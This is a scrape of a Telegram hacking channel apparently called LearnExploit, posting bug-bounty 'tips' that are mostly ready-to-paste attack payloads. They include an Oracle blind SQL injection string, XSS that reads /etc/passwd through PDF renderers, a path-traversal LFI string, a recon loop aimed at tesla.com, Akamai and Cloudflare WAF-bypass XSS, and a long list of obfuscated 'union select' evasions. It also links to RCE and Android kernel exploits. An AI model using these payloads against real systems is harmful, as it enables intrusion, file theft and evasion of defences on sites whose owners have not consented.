LearnExploit
#Osint #Telegram #Discord
Please open Telegram to view this post
VIEW IN TELEGRAM
✍5⚡3👍2❤1🔥1💯1
If you discover an oracle web app, you can use this payload
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
❤4👍2⚡1🔥1
NoMore403
Introduction:
Prerequisites:
Before you install and run
Installation:
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
Github
⬇️ Download
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Introduction:
nomore403
is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403
automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.Prerequisites:
Before you install and run
nomore403
, make sure you have the following:Go 1.15
or higher
installed on your machineInstallation:
cd nomore403
go get
go build
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
./nomore403 -h
Github
⬇️ Download
🔒 LearnExploit
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👍4
One line for subdomain
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
$(subfinder -d http://tesla.com| dnsx |httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👎3👍2❤1
XSS to Exfiltrate Data from PDFs 🔥🥵
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍5👎1
Quick and amazing LFI
#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts
#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7👎3👍1
Automating SSRF using Autorepeater
In the window of Auto-Repeater, we can specify some regex to find urls.
#SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
In the window of Auto-Repeater, we can specify some regex to find urls.
https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)
#SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍1
❤4❤🔥1
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5👍1
A kernel exploit for Pixel7/8 Pro with Android 14
Github
#Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - 0x36/Pixel_GPU_Exploit: Android 14 kernel exploit for Pixel7/8 Pro
Android 14 kernel exploit for Pixel7/8 Pro. Contribute to 0x36/Pixel_GPU_Exploit development by creating an account on GitHub.
👍3⚡2🔥2
Bypass open redirection whitelisted using chinese dots:
Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
%E3%80%82
Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤6
Defcon Media Server - This is an "index of /" with files from the Defcon Archive.
Link
#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5👍3🤝1
❤🔥8🫡2👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 1402
┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 1403
iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥13👍2💯1
0Day.Today | Learn Exploit | Zero World | Dark web |
┌──(LearnExploit㉿kali)-[~] └─$ sudo rm -rf 1402 ┌──(LearnExploit㉿kali)-[~] └─$ sudo mkdir 1403 iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни —————— 0Day.Today @LearnExploit @Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
❤9❤🔥2👍1
Akamai WAF bypass XSS
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4🔥3💯2⚡1❤1
Bypass SQL union select
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
🔥11👍5❤🔥2⚡1❤1
bypass XSS Cloudflare WAF
Encoded Payload:
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4